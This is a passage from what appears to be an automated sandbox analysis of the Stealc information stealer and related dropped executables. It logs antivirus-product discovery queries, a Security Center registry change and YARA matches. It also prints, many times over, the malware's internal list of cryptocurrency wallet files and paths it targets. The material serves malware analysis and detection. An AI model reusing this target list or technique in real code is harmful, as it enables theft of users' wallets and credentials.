                          Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_00786920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,17_2_00786920
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_00787850 GetProcessHeap,HeapAlloc,GetUserNameA,17_2_00787850
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_00787A30 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,17_2_00787A30
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C8A8390 NSS_GetVersion,17_2_6C8A8390
                          Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                          Lowering of HIPS / PFW / Operating System Security Settings

                          barindex
                          Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Provider\Av\{D68DDC3A-831F-4fae-9E44-DA132C1ACF46} STATEJump to behavior
                          Source: svchost.exe, 00000005.00000002.3779242730.0000015550702000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gramFiles%\Windows Defender\MsMpeng.exe
                          Source: svchost.exe, 00000005.00000002.3779242730.0000015550702000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.3443481489.0000000000ECE000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000002.3474153244.0000000000ECE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
                          Source: C:\Program Files\Windows Defender\MpCmdRun.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                          Source: C:\Program Files\Windows Defender\MpCmdRun.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                          Stealing of Sensitive Information

                          barindex
                          Source: Yara matchFile source: 13.2.axplong.exe.c50000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 10.2.axplong.exe.c50000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 9.2.axplong.exe.c50000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 6.2.file.exe.a00000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000000A.00000002.1425044391.0000000000C51000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000006.00000002.1376722618.0000000000A01000.00000040.00000001.01000000.00000004.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000009.00000002.1397149648.0000000000C51000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000D.00000003.1830413702.0000000005000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000006.00000003.1285449632.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000009.00000003.1356529894.0000000004880000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000D.00000002.3749374563.0000000000C51000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000A.00000003.1384745140.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000012.00000003.2190552389.0000000000DEB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000012.00000003.2193872573.0000000000DEB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: Offnewhere.exe PID: 7260, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: new_v8.exe PID: 2864, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: 550b7cfe5f.exe PID: 5732, type: MEMORYSTR
                          Source: Yara matchFile source: 17.0.stealc_default2.exe.770000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 17.2.stealc_default2.exe.770000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000011.00000002.2162755046.0000000000CEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000011.00000000.1886878201.000000000078E000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000011.00000000.1886855224.0000000000771000.00000080.00000001.01000000.00000009.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: stealc_default2.exe PID: 4092, type: MEMORYSTR
                          Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\stealc_default2[1].exe, type: DROPPED
                          Source: Yara matchFile source: Process Memory Space: stealc_default2.exe PID: 4092, type: MEMORYSTR
                          Source: stealc_default2.exe, 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpString found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: stealc_default2.exe, 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpString found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: stealc_default2.exe, 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpString found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: stealc_default2.exe, 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpString found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: stealc_default2.exe, 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpString found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: stealc_default2.exe, 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpString found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: stealc_default2.exe, 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpString found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: stealc_default2.exe, 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpString found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: stealc_default2.exe, 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpString found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: stealc_default2.exe, 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpString found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
